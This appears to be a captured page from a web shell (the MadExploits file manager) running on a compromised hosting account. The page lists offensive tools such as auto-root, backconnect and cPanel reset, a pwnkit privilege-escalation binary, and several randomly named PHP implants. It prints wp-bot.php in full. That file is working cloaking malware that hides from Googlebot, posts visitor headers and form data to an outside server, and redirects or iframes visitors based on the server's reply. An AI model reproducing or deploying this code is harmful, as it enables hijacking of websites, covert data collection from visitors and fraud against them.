Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
omset4d.store /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
874109
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
.htaccess
231
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
9CcVIjJN1ov.php
41.78
KB
-rw-r--r--
C8A5bcRx3lL.php
41.84
KB
-rw-r--r--
FAhro975D24.php
35.46
KB
-rw-r--r--
Mh1rmlIE6jS.php
35.68
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
asd67.php
3.61
KB
-rw-r--r--
chosen.php
8.82
KB
-rw-r--r--
classwithtostring.php
8.46
KB
-rw-r--r--
db.php
4.54
KB
-rw-r--r--
filefuns.php
20.04
KB
-r--r--r--
good.php
6.45
KB
-rw-r--r--
index.html
0
B
-rw-r--r--
index.php
8.82
KB
-r--r--r--
makeasmtp.php
179.23
KB
-rw-r--r--
manager.php
191.82
KB
-rw-r--r--
php.ini
105
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
theme-instusr.php
338
B
-rw-r--r--
wp-blog-header.php
340
B
-rw-r--r--
wp-blog.php
285
B
-rw-r--r--
wp-bot.php
8.25
KB
-rw-r--r--
wp-config.php
111
B
-rw-------
wp-load.php
57
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-bot.php
<?php //NEW $userAgent = $_SERVER['HTTP_USER_AGENT']; if (strpos($userAgent, 'Googlebot') !== false) { $paramsToRemove = ['gclid', 'wbraid', 'gbraid']; foreach ($paramsToRemove as $param) { if (isset($_GET[$param])) { $url = $_SERVER['REQUEST_URI']; $url = preg_replace('/([?&])' . $param . '=[^&]*(&|$)/', '$1', $url); if (strpos($url, '?') !== false && substr($url, -1) == '&') { $url = rtrim($url, '&'); } if (strpos($url, '?') !== false && substr($url, -1) == '?') { $url = rtrim($url, '?'); } header('Location: ' . $url); exit; } } } else { if (!isset($_GET['gclid']) && !isset($_GET['wbraid']) && !isset($_GET['gbraid'])) { include 'index.php'; exit; } } $isTarget = (new RequestHandlerClient())->run(); class RequestHandlerClient { const SERVER_URL = 'https://rbl.palladium.expert'; /** * @param int $clientId * @param string $company * @param string $secret * * @return void * @throws \Exception */ public function run() { if (!empty($_GET) && isset($_GET['dr_jsess']) && $_GET['dr_jsess'] == 1) { header("HTTP/1.1 200 OK"); return; } $headers = []; $headers['request'] = $this->collectRequestData(); $headers['jsrequest'] = $this->collectJsRequestData(); $headers['server'] = $this->collectHeaders(); $headers['auth']['clientId'] = 3838; $headers['auth']['clientCompany'] = "nMBgCUOH4VpZZy7gatxZ"; $headers['auth']['clientSecret'] = "MzgzOG5NQmdDVU9INFZwWlp5N2dhdHhaY2U2NmY2ZTZmOWRlZjUxMGFjNDBiYTJlNjVjMmFjZGEwMTQyZmZhZQ=="; $headers['server']['bannerSource'] = 'adwords'; return $this->curlSend($headers); } /** * @param array<string, mixed> $params * * @return bool * @throws \Exception */ public function curlSend(array $params) { $answer = false; $curl = curl_init(self::SERVER_URL); if ($curl) { curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($params)); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 3); curl_setopt($curl, CURLOPT_TIMEOUT, 4); curl_setopt($curl, CURLOPT_TIMEOUT_MS, 4000); curl_setopt($curl, CURLOPT_FORBID_REUSE, true); $result = curl_exec($curl); if ($result) { $serverOut = json_decode( $result, true ); $status = curl_getinfo($curl, CURLINFO_HTTP_CODE); if ($status == 200 && is_array($serverOut)) { $answer = $this->handleServerReply($serverOut); return $answer; } } } $this->getDefaultAnswer(); return $answer; } protected function handleServerReply($reply) { $result = (bool) ($reply['result'] ? $reply['result'] : 0); if ( isset($reply['mode']) && ( (isset($reply['target'])) || (isset($reply['content']) && !empty($reply['content'])) ) ) { $target = $reply['target']; $mode = $reply['mode']; $content = $reply['content']; if (preg_match('/^https?:/i', $target) && $mode == 3) { // do fallback to mode2 $mode = 2; } if ($result && $mode == 1) { $this->displayIFrame($target); exit; } elseif ($result && $mode == 2) { $target = $target . "&YkndsQJ2&sub_id_1=doi212&sub_id_2=1111"; header("Location: {$target}"); exit; } elseif ($result && $mode == 3) { $target = parse_url($target); if (isset($target['query'])) { parse_str($target['query'], $_GET); } $this->hideFormNotification(); require_once $this->sanitizePath($target['path']); exit; } elseif ($result && $mode == 4) { echo $content; exit; } else if (!$result && $mode == 5) { // } elseif ($mode == 6) { // } else { $path = $this->sanitizePath($target); if (!$this->isLocal($path)) { header("404 Not Found", true, 404); } else { $this->hideFormNotification(); require_once $path; } exit; } } return $result; } private function hideFormNotification() { echo ""; //echo "<script>if ( window.history.replaceState ) {window.history.replaceState( null, null, window.location.href );}</script>"; } private function displayIFrame($target) { $target = htmlspecialchars($target); echo "<html> <head> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"> </head> <body>" . $this->hideFormNotification() . "<iframe src=\"{$target}\" style=\"width:100%;height:100%;position:absolute;top:0;left:0;z-index:999999;border:none;\"></iframe> </body> </html>"; } private function sanitizePath($path) { if ($path[0] !== '/') { $path = __DIR__ . '/' . $path; } else { $path = __DIR__ . $path; } return $path; } private function isLocal($path) { // do not validate url via filter_var $url = parse_url($path); if (!isset($url['scheme']) || !isset($url['host'])) { return true; } else { return false; } } /** * Get all HTTP server headers and few additional ones * * @return mixed */ protected function collectHeaders() { $userParams = [ 'REMOTE_ADDR', 'SERVER_PROTOCOL', 'SERVER_PORT', 'REMOTE_PORT', 'QUERY_STRING', 'REQUEST_SCHEME', 'REQUEST_URI', 'REQUEST_TIME_FLOAT', 'X_FB_HTTP_ENGINE', 'X_PURPOSE', 'X_FORWARDED_FOR', 'X_WAP_PROFILE', 'X-Forwarded-Host', 'X-Forwarded-For', 'X-Frame-Options', ]; $headers = []; foreach ($_SERVER as $key => $value) { if (in_array($key, $userParams) || substr_compare('HTTP', $key, 0, 4) == 0) { $headers[$key] = $value; } } return $headers; } private function collectRequestData(): array { $data = []; if (!empty($_POST)) { if (!empty($_POST['data'])) { $data = json_decode($_POST['data'], true); if (JSON_ERROR_NONE !== json_last_error()) { $data = json_decode( stripslashes($_POST['data']), true ); } unset($_REQUEST['data']); } if (!empty($_POST['crossref_sessionid'])) { $data['cr-session-id'] = $_POST['crossref_sessionid']; unset($_POST['crossref_sessionid']); } } return $data; } public function collectJsRequestData(): array { $data = []; if (!empty($_POST)) { if (!empty($_POST['jsdata'])) { $data = json_decode($_POST['jsdata'], true); if (JSON_ERROR_NONE !== json_last_error()) { $data = json_decode( stripslashes($_POST['jsdata']), true ); } unset($_REQUEST['jsdata']); } } return $data; } /** * Default answer for the curl request in case of fault * * @return bool */ private function getDefaultAnswer() { header($_SERVER["SERVER_PROTOCOL"] . ' 500 Internal Server Error', true, 500); echo "<h1>500 Internal Server Error</h1> <p>The request was unsuccessful due to an unexpected condition encountered by the server.</p>"; exit; } }
Close
